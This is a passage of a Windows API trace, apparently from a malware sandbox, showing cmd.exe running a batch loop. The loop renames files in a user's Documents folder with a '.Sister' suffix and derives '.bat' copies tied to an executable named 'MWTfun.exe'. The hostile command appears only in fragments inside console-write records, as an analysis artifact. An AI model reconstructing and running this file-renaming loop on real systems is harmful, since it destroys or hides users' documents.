lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0303.765] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*) do ") returned 7 [0303.765] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.765] GetFileType (hFile=0x50) returned 0x2 [0303.765] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.765] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0303.765] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.765] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0303.766] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.766] GetFileType (hFile=0x50) returned 0x2 [0303.766] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.766] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0303.766] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.766] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95810*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c95810*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0303.767] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%a\" \"%~a.Sister\" ") returned 19 [0303.767] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.767] GetFileType (hFile=0x50) returned 0x2 [0303.767] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.767] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0303.767] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.767] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x13) returned 1 [0303.767] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9e8 | out: _Buffer=" & ") returned 3 [0303.768] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.768] GetFileType (hFile=0x50) returned 0x2 [0303.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.768] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0303.768] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.768] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0303.768] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe9b8 | out: _Buffer="for") returned 3 [0303.768] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.768] GetFileType (hFile=0x50) returned 0x2 [0303.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.769] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0303.769] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.769] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x3) returned 1 [0303.769] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" %a in ") returned 7 [0303.769] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.769] GetFileType (hFile=0x50) returned 0x2 [0303.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.770] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0303.770] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.770] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x7) returned 1 [0303.770] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0303.770] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.770] GetFileType (hFile=0x50) returned 0x2 [0303.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.770] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0303.771] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.771] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x55) returned 1 [0303.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.778] GetFileType (hFile=0x50) returned 0x2 [0303.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.778] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0303.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.779] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95630*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c95630*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0303.779] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%~a.Sister\" \"%~na.bat\" ") returned 25 [0303.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.779] GetFileType (hFile=0x50) returned 0x2 [0303.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.780] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0303.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.780] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x19) returned 1 [0303.781] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0303.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.781] GetFileType (hFile=0x50) returned 0x2 [0303.781] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.781] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0303.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.782] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0303.789] malloc (_Size=0xffce) returned 0x21ed8e90940 [0303.789] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0303.789] GetProcessHeap () returned 0x21ed8c70000 [0303.789] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d000 [0303.789] GetProcessHeap () returned 0x21ed8c70000 [0303.789] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95860 [0303.789] GetProcessHeap () returned 0x21ed8c70000 [0303.789] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95b60 [0303.789] GetProcessHeap () returned 0x21ed8c70000 [0303.789] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95880 [0303.789] GetProcessHeap () returned 0x21ed8c70000 [0303.789] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95880, Size=0x16) returned 0x21ed8c95660 [0303.789] GetProcessHeap () returned 0x21ed8c70000 [0303.789] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95660) returned 0x16 [0303.789] GetProcessHeap () returned 0x21ed8c70000 [0303.790] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95b80 [0303.790] FindFirstFileExW (in: lpFileName="*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7cf40 [0303.790] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6a39604, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6a39604, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="..", cAlternateFileName="")) returned 1 [0303.793] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c20e9d0, ftCreationTime.dwHighDateTime=0x1d5dd58, ftLastAccessTime.dwLowDateTime=0x51e00a80, ftLastAccessTime.dwHighDateTime=0x1d5859b, ftLastWriteTime.dwLowDateTime=0x51e00a80, ftLastWriteTime.dwHighDateTime=0x1d5859b, nFileSizeHigh=0x0, nFileSizeLow=0xd540, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="0H3WME_tqNVE6XV UFW.docx", cAlternateFileName="")) returned 1 [0303.793] GetProcessHeap () returned 0x21ed8c70000 [0303.793] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31c60 [0303.793] _wcsicmp (_String1="*", _String2=".") returned -4 [0303.793] _wcsicmp (_String1="*", _String2="..") returned -4 [0303.793] GetFileAttributesW (lpFileName="*" (normalized: "c:\\users\\fd1hvy\\documents\\*")) returned 0xffffffff [0303.793] GetLastError () returned 0x7b [0303.793] GetProcessHeap () returned 0x21ed8c70000 [0303.793] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c955c0 [0303.794] GetProcessHeap () returned 0x21ed8c70000 [0303.794] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c955c0, Size=0x44) returned 0x21ed8c7bb70 [0303.794] GetProcessHeap () returned 0x21ed8c70000 [0303.794] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7bb70) returned 0x44 [0303.794] GetProcessHeap () returned 0x21ed8c70000 [0303.794] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0303.794] GetProcessHeap () returned 0x21ed8c70000 [0303.794] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32630, Size=0x30) returned 0x21ed8d32630 [0303.794] GetProcessHeap () returned 0x21ed8c70000 [0303.794] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32630) returned 0x30 [0303.794] GetProcessHeap () returned 0x21ed8c70000 [0303.794] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32670 [0303.794] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0303.795] GetProcessHeap () returned 0x21ed8c70000 [0303.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bbc0 [0303.795] ??_V@YAXPEAX@Z () returned 0x1 [0303.795] GetProcessHeap () returned 0x21ed8c70000 [0303.795] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32670, Size=0x200) returned 0x21ed8d32670 [0303.795] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32670) returned 0x200 [0303.796] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32880 [0303.796] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32880, Size=0x290) returned 0x21ed8d32880 [0303.796] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32880) returned 0x290 [0303.796] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32b20 [0303.796] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32b20, Size=0x30) returned 0x21ed8d32b20 [0303.796] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32b20) returned 0x30 [0303.796] GetProcessHeap () returned 0x21ed8c70000 [0303.796] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32b60 [0303.796] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0303.797] GetProcessHeap () returned 0x21ed8c70000 [0303.797] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bf80 [0303.797] ??_V@YAXPEAX@Z () returned 0x1 [0303.797] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0303.797] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0303.798] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0303.798] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0303.798] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0303.799] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6a39604, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6a39604, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7ca60 [0303.799] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0303.799] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0303.799] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\0H3WME_tqNVE6XV UFW.docx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c20e9d0, ftCreationTime.dwHighDateTime=0x1d5dd58, ftLastAccessTime.dwLowDateTime=0x51e00a80, ftLastAccessTime.dwHighDateTime=0x1d5859b, ftLastWriteTime.dwLowDateTime=0x51e00a80, ftLastWriteTime.dwHighDateTime=0x1d5859b, nFileSizeHigh=0x0, nFileSizeLow=0xd540, dwReserved0=0x0, dwReserved1=0x0, cFileName="0H3WME_tqNVE6XV UFW.docx", cAlternateFileName="0H3WME~1.DOC")) returned 0x21ed8c7cfa0 [0303.799] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0303.799] _wcsnicmp (_String1="0H3WME~1.DOC", _String2="0H3WME_tqNVE6XV UFW.docx", _MaxCount=0x18) returned 31 [0303.799] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0303.800] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0303.800] GetProcessHeap () returned 0x21ed8c70000 [0303.800] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8910 [0303.800] ??_V@YAXPEAX@Z () returned 0x1 [0303.800] ??_V@YAXPEAX@Z () returned 0x1 [0303.800] GetProcessHeap () returned 0x21ed8c70000 [0303.800] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32b60, Size=0x1f8) returned 0x21ed8d32b60 [0303.800] GetProcessHeap () returned 0x21ed8c70000 [0303.800] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32b60) returned 0x1f8 [0303.800] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0303.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.800] GetFileType (hFile=0x50) returned 0x2 [0303.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.800] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0303.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.802] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0303.809] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.809] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0303.809] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0303.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.809] GetFileType (hFile=0x50) returned 0x2 [0303.809] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.809] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0303.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.810] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0303.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.810] GetFileType (hFile=0x50) returned 0x2 [0303.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.810] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0303.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.811] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d32640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d32640*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0303.811] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"0H3WME_tqNVE6XV UFW.docx\" \"0H3WME_tqNVE6XV UFW.docx.Sister\" ") returned 62 [0303.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.811] GetFileType (hFile=0x50) returned 0x2 [0303.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.811] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.812] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0303.812] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0303.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.812] GetFileType (hFile=0x50) returned 0x2 [0303.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.812] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0303.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.813] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0303.814] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0303.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.814] GetFileType (hFile=0x50) returned 0x2 [0303.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.814] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.815] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0303.815] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0303.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.815] GetFileType (hFile=0x50) returned 0x2 [0303.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.815] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.816] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0303.816] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0303.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.816] GetFileType (hFile=0x50) returned 0x2 [0303.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.816] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.817] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0303.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.821] GetFileType (hFile=0x50) returned 0x2 [0303.821] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.821] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0303.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.824] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d32b30*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d32b30*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0303.825] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.bat\" ") returned 61 [0303.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.825] GetFileType (hFile=0x50) returned 0x2 [0303.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.825] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.825] WriteConsoleW (in: 